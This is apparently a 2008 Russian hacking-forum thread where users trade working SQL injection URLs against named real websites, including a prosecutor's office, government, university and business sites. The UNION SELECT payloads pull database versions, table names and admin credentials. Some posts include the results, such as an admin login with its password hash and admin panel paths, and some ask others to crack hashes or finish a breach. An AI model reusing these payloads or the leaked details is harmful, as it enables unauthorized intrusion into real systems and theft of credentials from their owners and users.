30.12.2008, 18:37
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Код:
http://www.megaprint.com.ua/product.php?idr=107&idt=-1+union+select+group_concat(table_name,0x3a,table_rows),2,3,4,5,6+from+information_schema.tables--
http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/version()#
А далее мозгов не хватает
Код:
http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/concat(login,0x3a,password)/**/from/**/users+limit+0,1--
|
|
|
30.12.2008, 19:38
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
наткнулся на:
Код:
http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8--
выдает
Microsoft OLE DB Provider for SQL Server ошибка '80040e10'
дошел до
Код:
http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8*+from+msysobjects+in+'.'
выдал : Îòñóòñòâóåò çíà÷åíèå äëÿ îäíîãî èëè íåñêîëüêèõ òðåáóåìûõ ïàðàìåòðîâ.
может еще кто глубже капнет? а то интересно, че там в конце тунеля! ))) |
|
|
|
30.12.2008, 20:40
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Gemini12, тут нет скули!
|
|
|
|
30.12.2008, 21:03
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от mailbrush
Gemini12, тут нет скули!
Серьёзно? А что там есть? 
https://forum.antichat.ru/showpost.php?p=1024180&postcount=4430
|
|
|
|
30.12.2008, 22:23
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами:
9361826
Репутация:
115
|
|
Пр0kуратуpa Пермск0го Края 
http://www.prokuror.perm.ru/posts?id=-1+union+select+1,2,3,version(),5,DATABASE(),7,8,9--+
information_schema закрыта, или ее тупо нет, ибо версия 4, таблу с админами так и не нашел, админка в /admin/
Последний раз редактировалось prescott; 30.12.2008 в 22:34..
|
|
|
|
30.12.2008, 22:57
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Legis.krsn.ru - PR5 ~1.3к
http://www.legis.krsn.ru/lawsinfo.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
4 ветка..
Arabwestreport.info - PR5 ~1.3к
http://www.arabwestreport.info/AWR/article_details.php?article_id=-20182+union+select+1,2,concat_ws(0x3a,admin_userna me,admin_pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19+from+admins--
/webmanager
Co.dona-ana.nm.us - PR5 ~1.3к
http://www.co.dona-ana.nm.us/news/story.php?news_ID=-44+or+1=1/*
Rockportartcenter.com - PR4 ~0.7к
http://www.rockportartcenter.com/exhibitions/detail.php?uid=45'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,email+from+ user+limit+1,1/*
Последний раз редактировалось sabe; 30.12.2008 в 23:07..
|
|
|
|
31.12.2008, 00:48
|
|
Новичок
Регистрация: 22.12.2008
Сообщений: 16
С нами:
9149515
Репутация:
7
|
|
http://carepa.org/detail.php?uid=-53+union+select+1,2,3,4,5--
Не могу раскрутить, через order by показывает что там от 1 до 5 колонок но постоянно ошибка вылазит
|
|
|
|
31.12.2008, 01:09
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами:
9361826
Репутация:
115
|
|
Сообщение от vladvk
http://carepa.org/detail.php?uid=-53+union+select+1,2,3,4,5--
Не могу раскрутить, через order by показывает что там от 1 до 5 колонок но постоянно ошибка вылазит
Это значит скорее всего что параметр используется больше, чем в одном запросе, первый запрос прокатывает с 5 полями, второй выдает ошибку. В таких случаях или перебор, или ищи другой инъект. (Инъект не приходит в одиночку =)
например вот нормальная инъекция с этого сайта
Код:
http://carepa.org/mixers.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1--+
UPD: данные админа
Код:
http://carepa.org/mixers.php?id=-1+union+select+1,username,3,4,5,6,7,8,9,0,password+from+rc_admin--+
http://carepa.org/admin/
admin
$1$.y3.ta3.$Jk5.iyx3OT9IZlhJ8CKQy/
КТо скажет что за хэш?
Последний раз редактировалось prescott; 31.12.2008 в 01:16..
|
|
|
|
31.12.2008, 02:07
|
|
Новичок
Регистрация: 16.03.2007
Сообщений: 24
С нами:
10081559
Репутация:
2
|
|
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name),4,5 %20%20,6,7,8,9,10,11,12,13+from+information_schema .columns+where+table_name=0x494d45495f7573657273--
Помогите пожалуйста достать админ пасс и лог в ПМ => дам адресс админки
|
|
|
|
31.12.2008, 03:45
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
http://ishare.rediff.com/music_category.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(0x3a3a,version(),user(),database())--
5.1.30-log
imusicusr@10.50.31.24
imusic
http://www.fitnesstogether.com/news_view.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database())--
5.0.27-community-nt
admin_suite_user@localhost
admin_suite
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database()),8,9,10,11,12,13,14,15,16/*
5.0.38-Ubuntu_0ubuntu1.4-log
signupsuper@localhost
suggest
http://www.herpconstrust.org.uk/gallery/pic.php?id=21+union+select+1,2,concat_ws(0x3a3a,ve rsion(),user(),database()),4,5,6,7/*
4.1.19-standard-log
herpconstrust@localhost
herpconstrust
http://www.awards-world.com/art.php?id_article=-22+union+select+1,2,3,user(),5,6,7,8,9--&id_page=21
awardswo_admin@localhost
4.1.22-standard-log
awardswo_AWARDSWORLD
Всех с наступающим!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
